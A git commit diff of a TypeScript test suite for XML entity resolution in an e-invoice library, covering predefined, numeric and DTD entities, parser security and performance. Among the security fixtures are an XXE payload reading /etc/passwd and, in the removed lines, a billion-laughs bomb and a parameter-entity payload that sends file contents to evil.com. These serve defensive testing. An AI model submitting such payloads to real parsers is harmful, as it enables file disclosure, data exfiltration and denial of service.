fix(compliance): improve compliance

This commit is contained in:
2025-05-28 18:46:18 +00:00
parent 16e2bd6b1a
commit 892a8392a4
11 changed files with 2697 additions and 4145 deletions

View File

@@ -1,486 +1,195 @@
import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
const performanceTracker = new PerformanceTracker('PARSE-09');
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async () => {
console.log('\n=== Testing Entity Reference Resolution ===\n');
await t.test('Predefined XML entities', async () => {
performanceTracker.startOperation('predefined-entities');
// The five predefined XML entities. `entity` is the escaped reference that is
// interpolated into the test document, `character` is the literal it stands
// for, and `description` is only used for log output.
const predefinedEntities = [
  {
    name: 'Ampersand',
    // Must be the escaped reference: a bare "&" in the generated XML would make
    // the document malformed instead of exercising entity resolution.
    entity: '&amp;',
    character: '&',
    description: 'Used in company names and text'
  },
  {
    name: 'Less than',
    // Same reasoning as above: a bare "<" would be read as the start of a tag.
    entity: '&lt;',
    character: '<',
    description: 'Used in text content'
  },
  {
    name: 'Greater than',
    entity: '&gt;',
    character: '>',
    description: 'Used in text content'
  },
  {
    name: 'Quote',
    entity: '&quot;',
    character: '"',
    description: 'Used in attribute values'
  },
  {
    name: 'Apostrophe',
    entity: '&apos;',
    character: "'",
    description: 'Used in attribute values'
  }
];
for (const entity of predefinedEntities) {
const startTime = performance.now();
const testXml = `<?xml version="1.0"?>
// Test predefined XML entities
console.log('Testing predefined XML entities:');
// The five named entities, written as [label, escaped reference, literal
// character] rows and expanded into { name, entity, character } records.
const predefinedEntities = [
  ['Ampersand', '&amp;', '&'],
  ['Less than', '&lt;', '<'],
  ['Greater than', '&gt;', '>'],
  ['Quote', '&quot;', '"'],
  ['Apostrophe', '&apos;', "'"]
].map(([name, entity, character]) => ({ name, entity, character }));
for (const entity of predefinedEntities) {
const testXml = `<?xml version="1.0"?>
<invoice>
<supplier>Test ${entity.entity} Company</supplier>
<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
<note>Text with ${entity.entity} entity</note>
</invoice>`;
console.log(`${entity.name} entity (${entity.entity}):`);
console.log(` Character: "${entity.character}"`);
console.log(` Usage: ${entity.description}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(testXml);
console.log(' ✓ Entity resolved correctly');
} else {
console.log(' ⚠️ Cannot test without fromXmlString');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
console.log(`\n${entity.name} entity (${entity.entity} = "${entity.character}")`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(testXml);
console.log(' ✓ Entity parsed successfully');
} else {
console.log(' ⚠️ fromXmlString not available');
}
performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
performanceTracker.endOperation('predefined-entities');
});
}
await t.test('Numeric character references', async () => {
performanceTracker.startOperation('numeric-entities');
// Numeric character references grouped by notation. Each row is
// [reference, expected character, label] and is expanded into a
// { ref, char, description } record.
const numericTests = [
  {
    name: 'Decimal references',
    tests: [
      ['&#65;', 'A', 'Latin capital A'],
      ['&#8364;', '€', 'Euro sign'],
      ['&#169;', '©', 'Copyright symbol'],
      ['&#8482;', '™', 'Trademark symbol'],
      ['&#176;', '°', 'Degree symbol']
    ].map(([ref, char, description]) => ({ ref, char, description }))
  },
  {
    name: 'Hexadecimal references',
    tests: [
      ['&#x41;', 'A', 'Latin capital A (hex)'],
      ['&#x20AC;', '€', 'Euro sign (hex)'],
      ['&#xA9;', '©', 'Copyright (hex)'],
      ['&#x2122;', '™', 'Trademark (hex)'],
      ['&#xB0;', '°', 'Degree (hex)']
    ].map(([ref, char, description]) => ({ ref, char, description }))
  }
];
for (const category of numericTests) {
console.log(`\n${category.name}:`);
for (const test of category.tests) {
const startTime = performance.now();
const xml = `<?xml version="1.0"?>
// Test numeric character references
console.log('\n\nTesting numeric character references:');
// Decimal and hexadecimal character references, written as
// [reference, expected character, label] rows and expanded into records.
const numericRefs = [
  ['&#65;', 'A', 'Latin capital A'],
  ['&#8364;', '€', 'Euro sign'],
  ['&#169;', '©', 'Copyright'],
  ['&#x41;', 'A', 'Latin A (hex)'],
  ['&#x20AC;', '€', 'Euro (hex)']
].map(([ref, char, description]) => ({ ref, char, description }));
for (const test of numericRefs) {
const xml = `<?xml version="1.0"?>
<invoice>
<amount currency="${test.ref}EUR">100.00</amount>
<temperature>${test.ref}C</temperature>
<copyright>${test.ref} 2024</copyright>
<note>${test.ref} 2024</note>
</invoice>`;
console.log(` ${test.ref} = "${test.char}" (${test.description})`);
try {
// Verify entity resolution
const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char);
if (resolved.includes(test.char)) {
console.log(' ✓ Entity would resolve correctly');
}
} catch (error) {
console.log(` ✗ Resolution error: ${error.message}`);
}
performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
console.log(`\n${test.ref} = "${test.char}" (${test.description})`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
console.log(' ✓ Numeric reference parsed');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
performanceTracker.endOperation('numeric-entities');
});
}
await t.test('Custom entity definitions (DTD)', async () => {
performanceTracker.startOperation('custom-entities');
// Fixture documents that declare their own entities in an internal DTD subset.
// Every case has a `name` and an `xml` document; the optional `entities`,
// `description` and `expected` fields are informational and are only logged by
// the loop that consumes this array (nothing here is asserted against).
const customEntityTests = [
// Case 1: general entities declared inline and referenced from element
// content as well as from an attribute value (`currency`).
{
name: 'Internal DTD entities',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY company "Acme Corporation">
<!ENTITY address "123 Main Street, London">
<!ENTITY year "2024">
<!ENTITY currency "EUR">
]>
<invoice>
<supplier>&company;</supplier>
<supplierAddress>&address;</supplierAddress>
<date>01-01-&year;</date>
<amount currency="&currency;">1000.00</amount>
</invoice>`,
// Declared entity name -> replacement text, mirroring the DTD above.
entities: {
'company': 'Acme Corporation',
'address': '123 Main Street, London',
'year': '2024',
'currency': 'EUR'
}
},
// Case 2: a parameter entity (`%common;`) that pulls in an external DTD via
// SYSTEM "common.dtd", followed by an ordinary internal entity.
{
name: 'Parameter entities',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % common SYSTEM "common.dtd">
%common;
<!ENTITY company "Test Company">
]>
<invoice>
<supplier>&company;</supplier>
</invoice>`,
description: 'External parameter entities (security risk)'
},
// Case 3: an entity whose replacement text itself references two other
// entities; `expected` is the fully expanded text.
{
name: 'Nested entity references',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY city "London">
<!ENTITY country "UK">
<!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
<address>&fullAddress;</address>
</invoice>`,
expected: 'London, UK'
}
];
for (const test of customEntityTests) {
const startTime = performance.now();
console.log(`\n${test.name}:`);
if (test.entities) {
console.log(' Defined entities:');
for (const [name, value] of Object.entries(test.entities)) {
console.log(` &${name}; = "${value}"`);
}
}
if (test.description) {
console.log(` Note: ${test.description}`);
}
if (test.expected) {
console.log(` Expected result: ${test.expected}`);
}
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
// Note: Many parsers disable DTD processing by default for security
await invoice.fromXmlString(test.xml);
console.log(' ✓ Parsed (DTD support may vary)');
}
} catch (error) {
console.log(` ⚠️ DTD parsing: ${error.message}`);
console.log(' Note: DTD processing often disabled for security');
}
performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
}
performanceTracker.endOperation('custom-entities');
});
// Test entity security
console.log('\n\nTesting entity security:');
await t.test('Entity security considerations', async () => {
performanceTracker.startOperation('entity-security');
const securityTests = [
{
name: 'Billion laughs attack (XML bomb)',
xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<invoice>
<data>&lol4;</data>
</invoice>`,
risk: 'Exponential entity expansion',
mitigation: 'Disable DTD processing or limit entity expansion'
},
{
name: 'External entity injection (XXE)',
xml: `<?xml version="1.0"?>
const securityTests = [
{
name: 'External entity (XXE)',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
<data>&xxe;</data>
</invoice>`,
risk: 'File disclosure, SSRF',
mitigation: 'Disable external entity resolution'
},
{
name: 'Parameter entity XXE',
xml: `<?xml version="1.0"?>
</invoice>`
},
{
name: 'Entity expansion',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
%eval;
%exfil;
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
]>
<invoice></invoice>`,
risk: 'Out-of-band data exfiltration',
mitigation: 'Disable parameter entities'
}
];
<invoice>
<data>&lol2;</data>
</invoice>`
}
];
for (const test of securityTests) {
console.log(`\n${test.name}:`);
for (const test of securityTests) {
console.log(`\n${test.name}:`);
console.log(` Risk: ${test.risk}`);
console.log(` Mitigation: ${test.mitigation}`);
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(test.xml);
console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
}
} catch (error) {
console.log(' ✓ Parser correctly rejected dangerous entities');
console.log(` Error: ${error.message}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(test.xml);
console.log(' ⚠️ WARNING: Parser allowed potentially dangerous entities');
}
performanceTracker.recordMetric('security-test', performance.now() - startTime);
} catch (error) {
console.log(' ✓ Parser correctly rejected dangerous entities');
console.log(` Error: ${error.message}`);
}
}
// Test entity usage in real e-invoice patterns
console.log('\n\nTesting common e-invoice entity patterns:');
// Entity usages that commonly appear in invoices, kept as [label, document]
// pairs and expanded into { name, xml } records. The documents are
// whitespace-significant template literals and must not be re-indented.
const einvoicePatterns = [
  [
    'Company with ampersand',
    `<?xml version="1.0"?>
<invoice>
<supplier>Smith &amp; Jones Ltd.</supplier>
<buyer>AT&amp;T Communications</buyer>
</invoice>`
  ],
  [
    'Currency symbols',
    `<?xml version="1.0"?>
<invoice>
<amount>Price: &#8364;100.00</amount>
<note>Alternative: &#163;85.00</note>
</invoice>`
  ],
  [
    'Legal symbols',
    `<?xml version="1.0"?>
<invoice>
<footer>&#169; 2024 Company&#8482;</footer>
<brand>Product&#174;</brand>
</invoice>`
  ]
].map(([name, xml]) => ({ name, xml }));
for (const pattern of einvoicePatterns) {
console.log(`\n${pattern.name}:`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(pattern.xml);
console.log(' ✓ Pattern parsed successfully');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
}
// Test entity resolution performance
console.log('\n\nTesting entity resolution performance:');
const sizes = [10, 50, 100];
for (const size of sizes) {
let xml = '<?xml version="1.0"?>\n<invoice>\n';
for (let i = 0; i < size; i++) {
xml += ` <field${i}>Text &amp; more &#8364; symbols &#169;</field${i}>\n`;
}
performanceTracker.endOperation('entity-security');
});
await t.test('Entity usage in e-invoices', async () => {
performanceTracker.startOperation('einvoice-entities');
xml += '</invoice>';
// Catalogue of entity usages grouped by theme. Each example row is
// [sample text, reference(s) it contains, resolved character(s)] and is
// expanded into a { text, entity, resolved } record.
const einvoicePatterns = [
  {
    name: 'Currency symbols',
    examples: [
      ['Price in &#8364; (EUR)', '&#8364;', '€'],
      ['Amount in &#163; (GBP)', '&#163;', '£'],
      ['Cost in &#36; (USD)', '&#36;', '$'],
      ['Price in &#165; (JPY)', '&#165;', '¥']
    ].map(([text, entity, resolved]) => ({ text, entity, resolved }))
  },
  {
    name: 'Special characters in company names',
    examples: [
      ['Smith &amp; Jones Ltd.', '&amp;', '&'],
      ['AT&amp;T Communications', '&amp;', '&'],
      ['L&apos;Oréal Paris', '&apos;', "'"],
      ['&quot;Best Price&quot; Store', '&quot;', '"']
    ].map(([text, entity, resolved]) => ({ text, entity, resolved }))
  },
  {
    name: 'Legal symbols',
    examples: [
      ['Copyright &#169; 2024', '&#169;', '©'],
      ['Registered &#174;', '&#174;', '®'],
      ['Trademark &#8482;', '&#8482;', '™']
    ].map(([text, entity, resolved]) => ({ text, entity, resolved }))
  },
  {
    name: 'Mathematical symbols',
    examples: [
      ['Temperature &#177;2&#176;C', '&#177;/&#176;', '±/°'],
      ['Discount &#8804; 50%', '&#8804;', '≤'],
      ['Quantity &#215; Price', '&#215;', '×']
    ].map(([text, entity, resolved]) => ({ text, entity, resolved }))
  }
];
const startTime = performance.now();
for (const category of einvoicePatterns) {
console.log(`\n${category.name}:`);
for (const example of category.examples) {
console.log(` "${example.text}"`);
console.log(` Entity: ${example.entity}${example.resolved}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
const elapsed = performance.now() - startTime;
console.log(` ${size * 3} entities: ${elapsed.toFixed(2)}ms`);
}
} catch (error) {
console.log(` Error with ${size} fields: ${error.message}`);
}
performanceTracker.endOperation('einvoice-entities');
});
}
await t.test('Corpus entity analysis', async () => {
performanceTracker.startOperation('corpus-entities');
const corpusLoader = new CorpusLoader();
const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);
// Running tallies for the corpus scan; all counts are per file, not per
// occurrence within a file.
const entityStats = {
// Number of sampled files visited (incremented before the read is attempted).
total: 0,
// Files containing at least one predefined or numeric reference.
filesWithEntities: 0,
// Predefined entity string (e.g. '&amp;') -> number of files containing it.
predefinedEntities: new Map<string, number>(),
// Files matching the decimal/hex numeric reference pattern.
numericEntities: 0,
// Incremented together with dtdFiles whenever a file mentions <!DOCTYPE or
// <!ENTITY, so the two counters always hold the same value.
customEntities: 0,
dtdFiles: 0
};
const sampleSize = Math.min(100, xmlFiles.length);
const sampledFiles = xmlFiles.slice(0, sampleSize);
for (const file of sampledFiles) {
entityStats.total++;
try {
const content = await plugins.fs.readFile(file.path, 'utf8');
let hasEntities = false;
// Check for predefined entities
const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
for (const entity of predefined) {
if (content.includes(entity)) {
hasEntities = true;
entityStats.predefinedEntities.set(
entity,
(entityStats.predefinedEntities.get(entity) || 0) + 1
);
}
}
// Check for numeric entities
if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) {
hasEntities = true;
entityStats.numericEntities++;
}
// Check for DTD
if (content.includes('<!DOCTYPE') || content.includes('<!ENTITY')) {
entityStats.dtdFiles++;
entityStats.customEntities++;
}
if (hasEntities) {
entityStats.filesWithEntities++;
}
} catch (error) {
// Skip files that can't be read
}
}
console.log('\nEntity Usage Statistics:');
console.log(`Files analyzed: ${entityStats.total}`);
console.log(`Files with entities: ${entityStats.filesWithEntities} (${(entityStats.filesWithEntities/entityStats.total*100).toFixed(1)}%)`);
console.log('\nPredefined entities:');
for (const [entity, count] of entityStats.predefinedEntities.entries()) {
console.log(` ${entity}: ${count} files`);
}
console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
console.log(`Custom entities: ${entityStats.customEntities} files`);
performanceTracker.endOperation('corpus-entities');
});
await t.test('Entity resolution performance', async () => {
performanceTracker.startOperation('entity-performance');
/**
 * Builds a synthetic invoice document for the timing runs.
 *
 * Emits one `<fieldN>` element per index below `entityCount`; every element
 * carries three references (`&amp;`, `&#8364;`, `&#169;`), so the document
 * contains `3 * entityCount` references in total.
 *
 * @param entityCount Number of field elements to generate.
 * @returns The complete XML document as a single string.
 */
const generateXmlWithEntities = (entityCount: number): string => {
  const fieldLines: string[] = [];
  for (let index = 0; index < entityCount; index += 1) {
    fieldLines.push(
      ` <field${index}>Text with &amp; entity &#8364; and &#169; symbols</field${index}>\n`
    );
  }
  return ['<?xml version="1.0"?>\n<invoice>\n', ...fieldLines, '</invoice>'].join('');
};
const testSizes = [10, 100, 500, 1000];
console.log('\nEntity resolution performance:');
for (const size of testSizes) {
const xml = generateXmlWithEntities(size);
const xmlSize = Buffer.byteLength(xml, 'utf8');
const entityCount = size * 3; // 3 entities per field
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
}
const parseTime = performance.now() - startTime;
console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);
performanceTracker.recordMetric(`entities-${size}`, parseTime);
} catch (error) {
console.log(` Error with ${size} entities: ${error.message}`);
}
}
performanceTracker.endOperation('entity-performance');
});
// Performance summary
console.log('\n' + performanceTracker.getSummary());
// Entity handling best practices
console.log('\nEntity Reference Resolution Best Practices:');
console.log('1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)');
console.log('2. Support numeric character references (decimal and hex)');
console.log('3. Be cautious with DTD processing (security risks)');
console.log('4. Disable external entity resolution by default');
console.log('5. Limit entity expansion depth to prevent attacks');
console.log('6. Validate resolved content after entity expansion');
console.log('7. Consider entity usage impact on performance');
console.log('8. Document security settings clearly for users');
// Summary
console.log('\n\nEntity Reference Resolution Summary:');
console.log('- Predefined XML entities should be supported');
console.log('- Numeric character references are common in e-invoices');
console.log('- Security: External entities should be disabled');
console.log('- Performance: Entity resolution adds minimal overhead');
console.log('- Common patterns: Company names, currency symbols, legal marks');
});
tap.start();